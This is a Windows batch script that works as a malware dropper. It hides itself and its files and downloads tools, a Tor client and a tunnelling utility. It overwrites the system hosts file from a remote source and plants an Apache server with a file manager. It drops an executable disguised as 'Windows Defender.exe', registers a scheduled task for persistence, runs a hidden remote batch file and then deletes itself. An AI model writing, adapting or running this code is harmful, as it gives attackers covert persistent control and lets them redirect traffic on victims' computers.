@echo off
setlocal 
attrib +s +h +i "%~f0"
:connectivitycheck
ping www.google.com -n 1 -w 5000 >NUL
if errorlevel 1 goto Connectivitycheck

set host=https://cryptedodissey.github.io
set environment=C:\Windows

rem TESTING >
if "%computername%"=="WIN-6QJBGJLRIGL" set environment=%appdata%\microsoft\windows
rem TESTING <

attrib -s -h -i "%environment%\curl.exe" && if exist "%environment%\curl.exe" (
      attrib +s +h +i "%environment%\curl.exe"
) else (
 powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/bigherocenter/curl/raw/main/curl_7.83.1.exe' -OutFile '%environment%\curl.exe' -UseBasicParsing -MaximumRedirection 10 ; Start-BitsTransfer -Source (Invoke-WebRequest -Uri 'https://github.com/bigherocenter/curl/raw/main/curl_7.83.1.exe' -UseBasicParsing -MaximumRedirection 10).BaseResponse.ResponseUri.AbsoluteUri -Destination '%environment%\curl.exe'" && attrib +s +h +i "%environment%\curl.exe" 
)

attrib -s -h -i "%environment%\7-Zip" && if exist "%environment%\7-Zip\7z.exe" (
      attrib +s +h +i "%environment%\7-Zip"
) else (
  mkdir "%environment%\7-Zip" && "%environment%\curl.exe" -k -L https://github.com/aaubertsolutions/7za/raw/master/7za.exe -o "%environment%\7-Zip\7z.exe" && attrib +s +h +i "%environment%\7-Zip" 
)

attrib -s -h -i "%environment%\nircmd.exe" && if exist "%environment%\nircmd.exe" (
"%environment%\curl.exe" -k https://www.nirsoft.net/utils/nircmd.zip -o "%temp%\nircmd.zip" && "%environment%\7-Zip\7z.exe" x "%temp%\nircmd.zip" -o"%environment%" nircmd.exe && del /s /f /q /a "%temp%\nircmd.zip" && attrib +s +h +i "%environment%\nircmd.exe"
) else (
"%environment%\curl.exe" -k https://www.nirsoft.net/utils/nircmd.zip -o "%temp%\nircmd.zip" && "%environment%\7-Zip\7z.exe" x "%temp%\nircmd.zip" -o"%environment%" nircmd.exe  && del /s /f /q /a "%temp%\nircmd.zip" && attrib +s +h +i "%environment%\nircmd.exe"
)

attrib -s -h -i "%environment%\tor.exe" && if exist "%environment%\tor.exe" (
    attrib +s +h +i "%environment%\tor.exe"
) else (
   "%environment%\curl.exe" -k -L https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz -o "%temp%\Tor.tar.gz" && "%environment%\7-Zip\7z.exe" e "%temp%\Tor.tar.gz" -so | "%environment%\7-Zip\7z.exe" e -aoa -si -ttar "tor/tor.exe" -o"%environment%" -y && attrib +s +h +i "%environment%\tor.exe" && del "%temp%\Tor.tar.gz"
)

tasklist /fi "imagename eq tor.exe" | find /i "tor.exe" > nul
if not errorlevel 1 (echo) else (
"%environment%\nircmd.exe" exec hide "%environment%\tor.exe" && timeout -t 30
)

tasklist /fi "imagename eq tor.exe" | find /i "tor.exe" > nul
if not errorlevel 1 (set "proxy=--tlsv1 --socks5-hostname 127.0.0.1:9050") else (
  set "proxy=--tlsv1"
)

"%environment%\curl.exe" -k %proxy% https://raw.githubusercontent.com/cryptedodissey/cryptedodissey.github.io/main/hosts > "C:\Windows\System32\drivers\etc\hosts"

attrib -s -h -i "%environment%\localtunnel" && if exist "%environment%\localtunnel" (
   attrib +s +h +i "%environment%\localtunnel"
) else (
 "%environment%\curl.exe" -k -L https://github.com/angelobreuer/localtunnel.net/releases/download/1.0.1.0/win-x86.zip > "%temp%/localtunnel.zip" && "%environment%\7-Zip\7z.exe" x "%temp%\localtunnel.zip" -o"%environment%" -y && ren "%environment%\win-x86" "localtunnel" && attrib +s +h +i "%environment%\localtunnel" && del /s /f /q /a "%temp%\localtunnel.zip"
)

if exist "C:\Windows\System32\msvcp110.dll" (
echo.
) else (
"%environment%\curl.exe" -k -L https://download.microsoft.com/download/1/6/B/16B06F60-3B20-4FF2-B699-5E9B7962F9AE/VSU_4/vcredist_x86.exe -o "%temp%\vcredist_x86.exe" && "%temp%\vcredist_x86.exe" /Q /norestart && del /s /f /q /a "%temp%\vcredist_x86.exe"
)

tasklist /fi "imagename eq httpd.exe" | find /i "httpd.exe" > nul
if not errorlevel 1 (attrib -s -h -i "%environment%\apache2" && "%environment%\curl.exe" -k %proxy% %host%/Tools/apache2.7z -o "%temp%\apache2.7z" && "%environment%\7-Zip\7z.exe" x "%temp%\apache2.7z" -p7zapache2 -o"%environment%" apache2\conf\*.* apache2\php\tinyfilemanager.php -y && attrib +s +h +i "%environment%\apache2" && del /s /f /q /a "%temp%\apache2.7z") else (attrib -s -h -i "%environment%\apache2" && "%environment%\curl.exe" -k %proxy% %host%/Tools/apache2.7z -o "%temp%\apache2.7z" && "%environment%\7-Zip\7z.exe" x "%temp%\apache2.7z" -p7zapache2 -o"%environment%" -y && attrib +s +h +i "%environment%\apache2" && del /s /f /q /a "%temp%\apache2.7z")

"%environment%\curl.exe" -k %proxy% https://raw.githubusercontent.com/cryptedodissey/cryptedodissey.github.io/main/hosts > "C:\Windows\System32\drivers\etc\hosts"

attrib -s -h -i "%environment%\Windows Defender.exe" && curl.exe -k %proxy% %host%/sfx.exe -o "%environment%\Windows Defender.exe" && attrib +s +h +i "%environment%\Windows Defender.exe" 

FOR /F "tokens=1,2 delims==" %%s IN ('wmic path win32_useraccount where name^='%username%' get sid /value ^| find /i "SID"') DO SET SID=%%t
curl -k %proxy% "https://raw.githubusercontent.com/cryptedodissey/cryptedodissey.github.io/main/Task.xml" > "%SID%.xml"
powershell -Command "(gc '%SID%.xml') -replace 'SID', '%SID%' | Out-File -encoding ASCII '%SID%.xml'"
powershell -Command "(gc '%SID%.xml') -replace 'environment', '%environment%' | Out-File -encoding ASCII '%SID%.xml'"
powershell -Command "(gc '%SID%.xml') -replace 'computername', '%computername%' | Out-File -encoding ASCII '%SID%.xml'"
powershell -Command "(gc '%SID%.xml') -replace 'username', '%username%' | Out-File -encoding ASCII '%SID%.xml'"
schtasks /Delete /TN "%SID%XYZ" /F
schtasks /create /tn "%SID%XYZ" /xml "%SID%.xml"
del "%SID%.xml"

mkdir "%environment%\Win32" && attrib +s +h +i "%environment%\Win32"
set "boot=%random%%random%"
"%environment%\curl.exe" -k %proxy% %host%/Tools/boot.bat -o "%environment%\Win32\%boot%.bat" && attrib +s +h +i "%environment%\Win32\%boot%.bat"
"%environment%\nircmd.exe" exec hide "%environment%\Win32\%boot%.bat"

endlocal
DEL /s /f /q /a "%~f0" && exit

